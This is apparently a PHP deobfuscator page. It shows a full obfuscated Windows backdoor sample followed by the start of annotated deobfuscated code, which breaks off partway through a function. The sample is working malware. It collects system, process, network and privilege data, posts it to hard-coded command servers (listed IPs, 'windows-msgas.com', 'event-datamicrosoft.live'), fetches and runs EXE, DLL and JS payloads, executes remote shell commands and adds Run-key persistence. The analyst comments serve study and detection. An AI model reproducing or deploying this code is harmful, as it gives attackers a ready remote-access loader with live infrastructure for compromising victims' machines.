De-obfuscate PHP malware, viruses and tampering code found on WordPress sites back into readable code.
*Please note that not all obfuscated code can be decoded.<?php
// Analyst note: this is the obfuscated sample as submitted. Control flow is flattened with goto/label
// pairs, so the order of statements on the page is not the order of execution; execution starts at
// label GhGCf. Call sites vary the letter case of every function name (XnkeD, XNked, xNkEd, ...);
// PHP resolves function names case-insensitively, so each group refers to a single definition.
// The tool's deobfuscated output follows after this listing's closing PHP tag.
goto GhGCf; qtomL:
function rcbqD() {
goto iEtoA; IvNw3:
if (!$Dbe2H) {
goto UBiN4; }
goto MzOOL;
gFCj2: $wGaOo = null;
goto sR1P9; G4neJ:
$Nr7MT = $wGaOo["process"];
goto R1cu5;
tUwir: $PS9aF .= $gGLsg;
goto TkkmA; DtOG1: echo "$last_command == running" . PHP_EOL;
goto lw6sx;
xSyDZ: goto KSdn7;
goto X5ZKK; v6a3C: UBiN4: goto j83wj; TkkmA: KSdn7: goto IvNw3; NGQ1f: echo "$last_command == null" . PHP_EOL;
goto Jqr4f; XNNAh: fclose($V8__K[0]);
goto Y3VX_; iEtoA: global $wGaOo;
goto XCUPW; X5ZKK: eXYTz: goto tUwir; b57F5: $PS9aF = "out:" . PHP_EOL;
goto JHjwU;
gR3S1: $PS9aF .= "<empty>";
goto xSyDZ; JHjwU: if ($gGLsg) { goto eXYTz; } goto gR3S1; vmEZU: F9kwL: goto gFCj2; KWGqZ: $Dbe2H = stream_get_contents($V8__K[2]);
goto XNNAh; lw6sx: return null;
goto vmEZU; XCUPW: if (!(!$wGaOo || !isset($wGaOo["process"]) || !isset($wGaOo["pipes"]))) { goto iUh9Y; } goto NGQ1f;
gLhHj: $nSJJJ = proc_close($Nr7MT);
goto b57F5; j83wj: return $PS9aF;
goto c5Xkj; FUqxs: fclose($V8__K[2]);
goto gLhHj; Y3VX_: fclose($V8__K[1]);
goto FUqxs; R1cu5: $V8__K = $wGaOo["pipes"];
goto KcLcy; Jqr4f: return null;
goto b3ysM; sR1P9: $gGLsg = stream_get_contents($V8__K[1]);
goto KWGqZ; KcLcy: if (!proc_get_status($Nr7MT)["running"]) { goto F9kwL; } goto DtOG1; MzOOL: $PS9aF .= PHP_EOL . "err(" . $nSJJJ . "):" . PHP_EOL . $Dbe2H;
goto v6a3C; b3ysM: iUh9Y: goto G4neJ; c5Xkj: } goto z6oM9; sIg7z: vBmzE: goto EwTST; pzgi4: echo "active_cnt: " . $dCN4_ . PHP_EOL;
goto d1AUN; WOsYO: function BMLFv() { goto RoRvQ; t5ysc: return $qHIxs;
goto aKt0o; RoRvQ: $qHIxs = getenv("APPDATA") . "\\" . VJPpv() . rand(0, 1000000);
goto tHAes; tHAes: mkdir($qHIxs);
goto t5ysc; aKt0o: } goto qK03j; F_JOE: function rxiXT() { goto tin1z; r2rlA: $YvSKs ^= 0x15de8713;
goto yR9pu; iudFO: $YvSKs ^= $rNvND;
goto Ud2Db;
Ud2Db: $KyMPt = sprintf("%08x%08x", $t3Oc0, $YvSKs);
goto qsK_J; ZWOcq: $LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX);
goto WS5Kg; yR9pu: $rNvND = $rNvND + 0x29807914 & 0xffffffff;
goto TaEv6; GnW01: $YvSKs ^= $rNvND;
goto r3eEK; TaEv6: $fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff;
goto XLtXL; rWXXD: $YvSKs = $o28qH & 0xffffffff;
goto wBLcq; Cif7x: return ($USwKc !== '' ? "/" . $USwKc : '') . "/" . XnkeD(rand(0, 14)) . "&" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "/" . $FjQwC : '');
goto oHLbg; dgTra: $o28qH = (int) $Eh0Dq->getTimestamp() & (int) 1.8446744073709548E+19;
goto ZWOcq; XLtXL: $t3Oc0 ^= $fruA2;
goto iudFO; wBLcq: $fruA2 = $LSet6 >> 32 & 0xffffffff;
goto tnZ3G; xFAOW: $t3Oc0 ^= 0x86ad5709;
goto r2rlA; r3eEK: $YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff;
goto DsbEr; QMIwY: $t3Oc0 ^= 0x219f7609;
goto uIg6N; Tw4a2: $FjQwC = XnkeD(rand(0, 14));
goto Cif7x; tnZ3G: $rNvND = $LSet6 & 0xffffffff;
goto Zfmgf; qsK_J: $U0J5z = sprintf("%08x%08x", $fruA2, $rNvND);
goto Mn4pt; DsbEr: $t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff;
goto QMIwY; Zfmgf: $t3Oc0 ^= $fruA2;
goto GnW01; tin1z: $Eh0Dq = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
goto dgTra; WS5Kg: $t3Oc0 = $o28qH >> 32 & 0xffffffff;
goto rWXXD; Mn4pt: $USwKc = XNked(rand(0, 14));
goto Tw4a2; uIg6N: $YvSKs ^= 0xd1769498;
goto xFAOW; oHLbg: } goto ybxmE; ph3TX: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto sIg7z; NxBG4: $LcYWr = 10;
goto vSPwP; ztZND: $pC2k6 = chr(0xa);
goto lakjl; Pkc_7: return;
goto m8M9L; ybxmE: function mNFE9() { goto SLN3T; YlAz4: throw new Exception("Failed to execute command");
goto WK6XK; Mjmq1: exec("powershell -c " . eCI0t("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $pcI7I, $xv08g);
goto qpuf_; TAt8V: $pcI7I = '';
goto AjEZG; AjEZG: exec("powershell -c " . eCI0t("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $pcI7I, $xv08g);
goto WaE3I; rDHRq: $JGJW0["processes"] = json_decode(implode($pC2k6, $pcI7I), true);
goto CZvJe; xeNbX: throw new Exception("Failed to execute command");
goto yw8sc; dqSAy: throw new Exception("Failed to execute command");
goto fBXNh; KtFyp: $JGJW0["systeminfo"] = json_decode(implode($pC2k6, $pcI7I), true);
goto szlN5; fBXNh: JqFr0: goto V2trJ; SwHwH: hAxYv: goto KtFyp; CyXGe: oI7qv: goto GNCS4; szlN5: $pcI7I = '';
goto kvpOd; O_u62: if (!($xv08g !== 0)) { goto hAxYv; } goto MZ8Bw; xik0u: exec("powershell -c " . eCI0t("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
goto hGwbL; rTwG_: $JGJW0["other"]["id_loader"] = 43;
goto H8fAn; V2trJ: $JGJW0["other"]["version_build"] = $jIDpK;
goto o5pQ9; H8fAn: $JGJW0["other"]["runas"] = $pcI7I[0] ?? "UNKNOWN";
goto Uq1i5; SLN3T: global $jIDpK, $szWC8, $pC2k6;
goto Gb2wC; h5Dt2: $pcI7I = '';
goto A3qh6; oqutG: exec("powershell -c " . Eci0T("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
goto O_u62;
gHZpy: $JGJW0["arp"] = json_decode(implode($pC2k6, $pcI7I), true);
goto h5Dt2; O1ZSi: CXelO: goto rDHRq; zTeIp: exec("powershell -c " . eci0t("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $pcI7I, $xv08g);
goto VXiWg; WK6XK: J0rGW: goto gHZpy; kIhB2: $pcI7I = '';
goto xik0u; MZ8Bw: throw new Exception("Failed to execute command");
goto SwHwH; JZ8SA: throw new Exception("Failed to execute command");
goto O1ZSi; A3qh6: return $JGJW0;
goto ET34Z; hGwbL: if (!($xv08g !== 0)) { goto CXelO; } goto JZ8SA; GNCS4: $JGJW0["services"] = json_decode(implode($pC2k6, $pcI7I), true);
goto zzFnW; yw8sc: J78O1: goto KaCH2; VXiWg: if (!($xv08g !== 0)) { goto J78O1; } goto xeNbX; WaE3I: if (!($xv08g !== 0)) { goto J0rGW; } goto YlAz4; CZvJe: $pcI7I = '';
goto Mjmq1; zzFnW: $pcI7I = '';
goto zTeIp; kvpOd: exec("powershell -c " . ECI0T("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $pcI7I, $xv08g);
goto dH2kx; dH2kx: if (!($xv08g !== 0)) { goto JqFr0; } goto dqSAy; Uq1i5: $JGJW0["other"]["type_file"] = "PHP";
goto kIhB2;
gn1Mi: throw new Exception("Failed to execute command");
goto CyXGe; o5pQ9: $JGJW0["other"]["id_local"] = mt_rand(0, 100000000);
goto rTwG_; qpuf_: if (!($xv08g !== 0)) { goto oI7qv; } goto gn1Mi; KaCH2: $JGJW0["drives"] = json_decode(implode($pC2k6, $pcI7I), true);
goto TAt8V; Gb2wC: $JGJW0 = [];
goto oqutG; ET34Z: } goto l4tr9; dfbng: if (!true) { goto w_p_e; } goto bc_XP; GhGCf: $szWC8 = chr(0x22);
goto ztZND; kImNn: function ecI0T($b3TRq) { global $szWC8; return $szWC8 . $b3TRq . $szWC8; } goto F_JOE; xaPFx: function A2uxo($xbNO5) { goto DmaWr; SHkBb: $ERqBI = $xbNO5 . $rasAm;
goto ENAdj; ENAdj: return gzencode($ERqBI, 5, FORCE_GZIP);
goto LVrZW; bA6ex: R7s9b($xbNO5, $rasAm);
goto SHkBb; M_vHj: $rasAm = pack("V", $Ot6LN);
goto bA6ex; DmaWr: $Ot6LN = mt_rand(0, 100000000);
goto M_vHj; LVrZW: } goto Ikv0Q; teN0x: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
goto azANG; m8M9L: Hbr23: goto C4SdR; smHwj: echo "delay: " . $LcYWr . PHP_EOL;
goto pzgi4; uRlZE: function UrHlx() { goto pKxxt; bSPgh: if (!(!$ZqddJ || !preg_match_all("/\s-r\s/", $ZqddJ))) { goto w5I3u; } goto Dzjht; n1kqv: $Y72oh = preg_split("/php\.exe.*?\s-r\s+/", $xU41z, 2);
goto eOgzd; RNPOv: zRlqv: goto Bjbd0; FnYn0: $oyBW1 = __FILE__;
goto bRGWU; iGUoA: if (QrOFA()) { goto zRlqv; } goto FnYn0; hOX6z: Uxm1w: goto Dzygw; Bjbd0: $oyBW1 = dirname(PHP_BINARY) . xNked(12) . ".txt";
goto G84tC; Dzygw: exec("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v " . Eci0t(VjppV()) . " /t REG_SZ /d " . eci0t("\\" . $szWC8 . PHP_BINARY . "\\" . $szWC8 . " \\" . $szWC8 . $oyBW1 . "\\" . $szWC8) . " /f");
goto BEWR2; VobaU: $pDMmF = explode($pC2k6, $ZqddJ, 2);
goto KnYOk; pKxxt: global $szWC8, $pC2k6;
goto iGUoA; xC0RO: w5I3u: goto VobaU; BEWR2: return true;
goto oVM4F; Mb8m7: file_put_contents($oyBW1, $uJtGi);
goto hOX6z; eOgzd: $uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : '';
goto Mb8m7; Dzjht: return false;
goto xC0RO; KnYOk: $xU41z = trim($pDMmF[1] ?? '');
goto n1kqv; G84tC: $ZqddJ = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
goto bSPgh; bRGWU: goto Uxm1w;
goto RNPOv; oVM4F: } goto fc1nJ; z6oM9: function lFVIE($xLjoz, $d0PbW) { goto zxRUJ; akcjb: $o_rCT = "powershell.exe -WindowStyle Hidden -c " . ECi0t("Start-Process -WindowStyle Hidden -FilePath '" . $xLjoz . "'" . ($d0PbW ? " -ArgumentList '" . preg_replace("/" . $szWC8 . "/", "\\" . $szWC8, $d0PbW) . "'" : ''));
goto dEHsl; dEHsl: echo $o_rCT . $pC2k6 . $pC2k6;
goto QId0W; zxRUJ: global $szWC8, $pC2k6;
goto akcjb; QId0W: shell_exec($o_rCT);
goto FFokY; FFokY: } goto WOsYO; YWsb9: function Y40sz($nG_P0, $Yem6z) { goto XzqaQ; w4_1H: $abtZm->close();
goto gTt8M; u71rV: rewind($PH23F);
goto F1pv_; SvUr2: if (!($Mbxm4 !== true)) { goto d2ZIq; } goto Ix7oY; CKc57: return true;
goto siNDm; D_vXs: fclose($PH23F);
goto nWlDf; Rqxww: $abtZm->close();
goto D_vXs; W7Pvu: return false;
goto FCsu7; Ix7oY: fclose($PH23F);
goto W7Pvu; zLO6Y: tttcO: goto w4_1H; FCsu7: d2ZIq: goto RjHFo;
ghuFk: if (mkdir($Yem6z, 0777, true)) { goto isOEF; } goto i7rJO; RjHFo: if ($abtZm->extractTo($Yem6z)) { goto tttcO; } goto Rqxww; XzqaQ: if (file_exists($Yem6z)) { goto qw6IQ; } goto ghuFk; p5QAD: $cTc0_ = file_get_contents($nG_P0);
goto DwC7G; i7rJO: return false;
goto BAppL; YFhHt: $Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["uri"]);
goto SvUr2; BAppL: isOEF: goto tkJFY; tkJFY: qw6IQ: goto p5QAD;
gTt8M: fclose($PH23F);
goto CKc57; F1pv_: $abtZm = new XdeZr();
goto YFhHt; DaxKI: fwrite($PH23F, $cTc0_);
goto u71rV; nWlDf: return false;
goto zLO6Y; DwC7G: $PH23F = tmpfile();
goto DaxKI; siNDm: } goto uRlZE; tBEQV: if (count($h0b7d) > 0) { goto DGU7d; } goto teN0x; PI6eX: $dlA_m = 0;
goto EgCuT; OUc5x: goto V3Oj2;
goto JgSSO; vwBQl: $h0b7d = ["windows-msgas.com", "event-datamicrosoft.live", "varying-rentals-calgary-predict.trycloudflare.com"];
goto tBEQV; XAM1e: $JcEot = 80;
goto Klamn; S4yY7: DGU7d: goto ph3TX; KMXag: $wGaOo = null;
goto NvD7d; l4tr9: function r7s9B(&$xbNO5, $eAmVW) { goto jUYbm; jUYbm: $s9r5b = ord($eAmVW[0]);
goto zADLb; bnowv: W3BJA: goto S_cN9; tTRhB: $Mc_Hp = 0;
goto Ast8k; ZQtcn: goto kAq95;
goto bnowv; HPUYH: $xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256);
goto ziig9; IYGwm: if (!($Mc_Hp < $cbiCS)) { goto W3BJA; } goto TXIrG; Ast8k: kAq95: goto IYGwm; TXIrG: $s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256;
goto HPUYH; I0zBE: $kt3y8 = strlen($eAmVW);
goto tTRhB; ziig9: kp_B5: goto qKS6q; zADLb: $cbiCS = strlen($xbNO5);
goto I0zBE; qKS6q: ++$Mc_Hp;
goto ZQtcn; S_cN9: } goto xaPFx; Yi5pH: $dCN4_ = 0;
goto Bvdh_; Klamn: $D_3Y7 = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
goto Yi5pH; NvD7d: function deG1t($d0PbW) { goto U26fL; U26fL: global $wGaOo;
goto rKPLw; rKPLw: $qA50S = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
goto vIbJr; vIbJr: $Nr7MT = proc_open($d0PbW, $qA50S, $V8__K);
goto Fk4aN; HUWz5: OIHx8: goto ImEOy; q1kMs: return "<failed>";
goto HUWz5; ImEOy: $wGaOo = ["process" => $Nr7MT, "pipes" => $V8__K];
goto Ir0ws; Fk4aN: if (is_resource($Nr7MT)) { goto OIHx8; } goto q1kMs; Ir0ws: } goto qtomL; Ikv0Q: function EtUpz($A4YkN, $xbNO5) { goto uiUap; IAKYX: $Ql4QK = (int) $fUPyD[1];
goto aHYEC; aHYEC: oo9y0: goto P9uXG; DtSgv: $HhbRp = null;
goto xRdNz; IF9yw: $H6YXK = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $xbNO5, "ignore_errors" => true, "timeout" => 20]];
goto YMMrn; Ls2Pd: if (!isset($http_response_header[0])) { goto ycYgX; } goto XK2NZ; upemk: $nuWcv = stream_context_create($H6YXK);
goto DtSgv; P9uXG: ycYgX: goto r77la; dG83c: if (!($RwYxj === false)) { goto Tdx4n; } goto asX3w; YMMrn: $nG_P0 = "http://" . $A4YkN . ":" . $JcEot . rXiXT();
goto upemk; uiUap: global $JcEot;
goto IF9yw; PEG3G: restore_error_handler();
goto dG83c; r77la: return ["content" => $RwYxj, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Ql4QK];
goto A9CR4; KYMz3: $Ql4QK = 0;
goto Ls2Pd; asX3w: throw new Exception("HTTP request failed: " . ($HhbRp ?: "Unknown error"));
goto QdSL7; XK2NZ: preg_match("/HTTP\/\d\.\d\s+(\d{3})/", $http_response_header[0], $fUPyD);
goto K4aXs; B31AZ: $RwYxj = file_get_contents($nG_P0, false, $nuWcv);
goto PEG3G; K4aXs: if (!isset($fUPyD[1])) { goto oo9y0; } goto IAKYX; xRdNz: set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) { $HhbRp = $Mxyq3; });
goto B31AZ; QdSL7: Tdx4n: goto KYMz3; A9CR4: } goto YWsb9; azANG: goto vBmzE;
goto S4yY7; Bvdh_: $rst7P = MNfE9();
goto GGsaL; S7l7m: LfVIE(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . ECi0T(__FILE__) . " 1");
goto Pkc_7; C4SdR: $jIDpK = 20;
goto XAM1e; lakjl: if (!($argc < 2 && !qrOfa() || !extension_loaded("zip") && file_exists(__FILE__))) { goto Hbr23; } goto S7l7m; EwTST: $TZ64Y = 200;
goto PI6eX; vSPwP: $b2dL6 = ["159.69.187.78", "64.95.12.71", "184.95.51.165"];
goto vwBQl; GGsaL: function QROfA() { global $argv; return $argv[0] === "Standard input code"; } goto kImNn; fc1nJ: function vJppV() { goto oeWc2; JOrZw: $inBis = array_values($inBis);
goto jSXR6; jSXR6: print_r($inBis);
goto LF76G; oeWc2: $inBis = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
goto FqHis; FqHis: $inBis = array_diff($inBis, [".", ".."]);
goto JOrZw; LF76G: return $inBis[rand(0, count($inBis) - 1)];
goto W_MW9; W_MW9: } goto VN3bi; qK03j: function mOJ2M($A4YkN) { goto E6092; oe9Eo: bVOXu: goto X5UZm; Kh4oY: if (!(($u7kKd = RCbQd()) !== null)) { goto bVOXu; } goto kMs0H; X5UZm: $uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT)));
goto CjTrc; nJvML: if (!($Ql4QK !== 200)) { goto rweeZ; } goto Zq6SB; TG7Ws: $Ql4QK = $uJtGi["code"];
goto kL4WH; uS_iH: Qi1fs: goto b5HGd; I7s0k: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1);
goto OF1U2; VXOzv: switch ($miAdf) { case $D_3Y7["CMD"]: goto KbFcF; Hwxi8: DEg1T($o0HyG);
goto dYUqj; dYUqj: return;
goto F4zqm; KbFcF: echo "CMD" . PHP_EOL;
goto Hwxi8; F4zqm: case $D_3Y7["ACTIVE"]: goto szNmR; WEBBC: return;
goto MLaj6; szNmR: echo "ACTIVE" . PHP_EOL;
goto kN7r9; kN7r9: $dCN4_ = unpack("V", $o0HyG)[1];
goto WEBBC; MLaj6: case $D_3Y7["AUTORUN"]: goto yTNdL; A_UVE: URHlX();
goto HFtUq; HFtUq: return;
goto xPlUz; yTNdL: echo "AUTORUN" . PHP_EOL;
goto A_UVE; xPlUz: case $D_3Y7["OFF"]: echo "OFF" . PHP_EOL; exit(0); case $D_3Y7["EXE"]: goto yCtrZ; uBb1t: file_put_contents($xLjoz, $o0HyG);
goto d0zSU; yCtrZ: echo "EXE" . PHP_EOL;
goto XW7m0; XW7m0: $xLjoz = BMlfV() . "\\" . xNkEd(8) . ".exe";
goto uBb1t; d0zSU: goto nJLGE;
goto NVxS3; NVxS3: case $D_3Y7["DLL"]: goto W1nPU; umqro: $yYiH5 = bmlfV() . "\\" . XnkeD(8) . ".png";
goto v9BNu; m2qgo: $d0PbW = ecI0T($yYiH5) . " start";
goto FWxGw; VqA0a: goto nJLGE;
goto E92UY; v9BNu: $xLjoz = "C:\Windows\System32
undll32.exe";
goto m2qgo; FWxGw: file_put_contents($yYiH5, $o0HyG);
goto VqA0a; W1nPU: echo "DLL" . PHP_EOL;
goto umqro; E92UY: case $D_3Y7["JS"]: goto yuPJ6; yuPJ6: echo "JS" . PHP_EOL;
goto h_KkM; h_KkM: $xLjoz = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64
ode.exe";
goto bPtdr; ig9mY: echo "failed install nodejs" . PHP_EOL;
goto qk3BX; bPtdr: if (!(!file_exists($xLjoz) && !y40SZ("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) { goto W3oml; } goto ig9mY; Y_Aem: file_put_contents($d0PbW, $o0HyG);
goto zCIdG; tdIKS: $d0PbW = BmLfv() . "\\" . XNKed(8) . ".jpg";
goto Y_Aem; zCIdG: goto nJLGE;
goto w3k0S; qk3BX: return;
goto uD0kN; uD0kN: W3oml: goto tdIKS; w3k0S: default: goto s2nJZ; TNSP3: file_put_contents(BmlfV() . "\\" . XnkeD(8) . ".txt", $o0HyG);
goto I3SlV; I3SlV: return;
goto rdFY5; s2nJZ: echo "OTHER" . PHP_EOL;
goto TNSP3; rdFY5: } goto uS_iH; nCcIW: $oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG));
goto OUirS; E6092: global $rst7P, $D_3Y7, $szWC8, $dCN4_;
goto Kh4oY; lsNbT: lfViE($xLjoz, $d0PbW);
goto PhVCY; kMs0H: $rst7P["cmd"] = $u7kKd;
goto oe9Eo; NRL85: rweeZ: goto nCcIW; OUirS: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4);
goto BdwFO; b5HGd: nJLGE: goto lsNbT; kL4WH: if (!($Ql4QK == 204)) { goto zQM0Z; } goto tuOdf; CjTrc: unset($rst7P["cmd"]);
goto O4_i1; OF1U2: $d0PbW = null;
goto VXOzv; BdwFO: R7s9B($o0HyG, $oAl9r);
goto PCb5g; Zq6SB: throw new Exception("HTTP request failed: " . $Ql4QK);
goto NRL85; tuOdf: echo "204" . PHP_EOL;
goto ojXAZ; PCb5g: $miAdf = ord($o0HyG[strlen($o0HyG) - 1]);
goto I7s0k; VE56b: zQM0Z: goto nJvML; O4_i1: $o0HyG = $uJtGi["content"];
goto TG7Ws; ojXAZ: return;
goto VE56b; PhVCY: } goto NxBG4; bc_XP: try { goto G8o3o; b3ZA4: if ($dlA_m >= $TZ64Y + 10) { goto SuLft; } goto dqR1N; KKvsW: xVHKd: goto PprER; G8o3o: echo $A4YkN . PHP_EOL;
goto KeU2e; PprER: $dlA_m = 0;
goto LWgVS; MQiTv: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto MKzlP; Lrde_: goto WdXyd;
goto jp4cX; WAede: $dCN4_--;
goto iaT6S; FHp7r: goto yt0U2;
goto KKvsW; eWaiy: $LcYWr = 10;
goto WAede; LWgVS: yt0U2: goto Lrde_; iaT6S: c81pJ: goto b3ZA4; E09nS: if ($dCN4_ > 0) { goto wbBrA; } goto rK6Ut; Nq2kv: $dlA_m = $TZ64Y - 10;
goto ch1LL; RCrAZ: WdXyd: goto xHwH3; x6bWr: wbBrA: goto eWaiy; dqR1N: if ($dlA_m < $TZ64Y) { goto xVHKd; } goto bIkHK; ch1LL: if (!(count($h0b7d) > 0)) { goto njjkr; } goto MQiTv; MKzlP: njjkr: goto RCrAZ; rK6Ut: $LcYWr = 5 * 60;
goto WieJG; KeU2e: echo $dlA_m . PHP_EOL;
goto xMM4K; bIkHK: $dlA_m++;
goto FHp7r; WieJG: goto c81pJ;
goto x6bWr; jp4cX: SuLft: goto Nq2kv; xMM4K: moJ2m($A4YkN);
goto E09nS; xHwH3: } catch (Throwable $Umveq) { goto wptzU; puz2n: $LcYWr = 10;
goto R4mvO; QavQA: WGLsq: goto puz2n; kSgzE: $dlA_m++;
goto JoIY7; Y0Lll: goto WGLsq;
goto F6Iwd; wptzU: echo $pC2k6 . "Error: " . $Umveq->getMessage() . $pC2k6;
goto kSgzE; R4mvO: $dCN4_ = 0;
goto qURNi; JoIY7: if ($dlA_m < $TZ64Y && count($h0b7d) > 0) { goto C78vx; } goto m7fon; F6Iwd: C78vx: goto JCQys; JCQys: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto QavQA; m7fon: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
goto Y0Lll; qURNi: } goto smHwj; EgCuT: V3Oj2: goto dfbng; d1AUN: sleep($LcYWr);
goto OUc5x; VN3bi: function XNKeD($zcvYL = 16) { goto yWThk; nL0BB: $b3TRq .= $Ke3ba[rand(0, $brHta - 1)];
goto GkO5U; yWThk: $Ke3ba = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
goto HuuRn; rIPsG: if (!($Mc_Hp < $zcvYL)) { goto pP0ox; } goto nL0BB; kdKdZ: NWTYT: goto rIPsG; b8Tav: goto NWTYT;
goto DGVWR; o0GmT: return $b3TRq;
goto l_C7v; HuuRn: $brHta = strlen($Ke3ba);
goto fL917; DGVWR: pP0ox: goto o0GmT; GEnfc: $Mc_Hp++;
goto b8Tav; fL917: $b3TRq = '';
goto DMxcX; GkO5U: o61fz: goto GEnfc; DMxcX: $Mc_Hp = 0;
goto kdKdZ; l_C7v: } goto KMXag; JgSSO: w_p_e:
?><?php
// Deobfuscator output starts here. It is an analysis aid rather than a runnable reconstruction:
// the functions are declared inside the `if` body after MNfE9() is already called, and several
// expressions were constant-folded using the tool's own environment (flagged where they occur).
// $szWC8 is a double-quote character and $pC2k6 a newline; both are read as globals further down.
$szWC8 = "\"";
$pC2k6 = "\n";
// Launch guard. The obfuscated listing tests file_exists(__FILE__) here; "/var/www/html/input.php"
// appears to be the sample's path on the deobfuscation service, not a path chosen by the author.
if (!($argc < 2 && !qrOfa() || !extension_loaded("zip") && file_exists("/var/www/html/input.php"))) {
// Build number, reported to the server as "version_build".
$jIDpK = 20;
// TCP port used for the HTTP check-in.
$JcEot = 80;
// Task-type codes; the last decoded byte of a server response selects one of them.
$D_3Y7 = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
// Fast-poll counter set by the ACTIVE task: while it is above zero the loop sleeps 10 s, not 300 s.
$dCN4_ = 0;
// Host profile, collected once at start-up and re-sent on every check-in.
$rst7P = MNfE9();
/**
 * Reports whether the interpreter was started with inline code instead of a script file, by
 * comparing $argv[0] with the literal "Standard input code".
 * NOTE(review): the PHP CLI is understood to report that value for `php -r` and stdin code;
 * confirm on the PHP build in question. UrHlx() makes the same distinction when it looks for "-r".
 *
 * @return bool true when $argv[0] is exactly "Standard input code"
 */
function QROfA()
{
global $argv;
return $argv[0] === "Standard input code";
}
/**
 * Wraps a string in double quotes (the global $szWC8) so it can be appended to a command line as
 * one argument. Double quotes already present in $b3TRq are not escaped here.
 *
 * @param string $b3TRq text to quote
 * @return string the text surrounded by double quotes
 */
function ecI0T($b3TRq)
{
global $szWC8;
return $szWC8 . $b3TRq . $szWC8;
}
/**
 * Builds the URL path used for one check-in request.
 *
 * A masked timestamp and a 64-bit random value are split into 32-bit halves, mixed with fixed
 * XOR/add constants and printed as four "%08x" fields (32 hex characters in total). That hex run is
 * placed after a literal "&" and surrounded by random alphanumeric segments of 0-14 characters.
 *
 * Detection: request paths therefore have the shape
 *   [/<alnum 0-14>]/<alnum 0-14>&<32 hex chars>[/<alnum 0-14>]
 * which is a usable proxy/web-log pattern together with the POST method set in EtUpz().
 *
 * @return string URL path beginning with "/"
 */
function rxiXT()
{
// getTimestamp() returns Unix time, so the "Etc/GMT+5" zone does not change the value used below.
$Eh0Dq = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
// Tool-folded constant: the obfuscated listing has `& (int) 1.8446744073709548E+19` here. Casting
// an out-of-range float to int is not well defined in PHP, so -4096 reflects the tool's runtime;
// verify the effective mask before relying on it.
$o28qH = (int) $Eh0Dq->getTimestamp() & -4096;
$LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX);
// Split both 64-bit values into high/low 32-bit halves.
$t3Oc0 = $o28qH >> 32 & 0xffffffff;
$YvSKs = $o28qH & 0xffffffff;
$fruA2 = $LSet6 >> 32 & 0xffffffff;
$rNvND = $LSet6 & 0xffffffff;
// Mix the timestamp halves with the random halves, then add a constant with manual carry.
$t3Oc0 ^= $fruA2;
$YvSKs ^= $rNvND;
$YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff;
$t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff;
$t3Oc0 ^= 0x219f7609;
$YvSKs ^= 0xd1769498;
$t3Oc0 ^= 0x86ad5709;
$YvSKs ^= 0x15de8713;
// Same add-with-carry step applied to the random halves, which are sent alongside the mixed value.
$rNvND = $rNvND + 0x29807914 & 0xffffffff;
$fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff;
$t3Oc0 ^= $fruA2;
$YvSKs ^= $rNvND;
$KyMPt = sprintf("%08x%08x", $t3Oc0, $YvSKs);
$U0J5z = sprintf("%08x%08x", $fruA2, $rNvND);
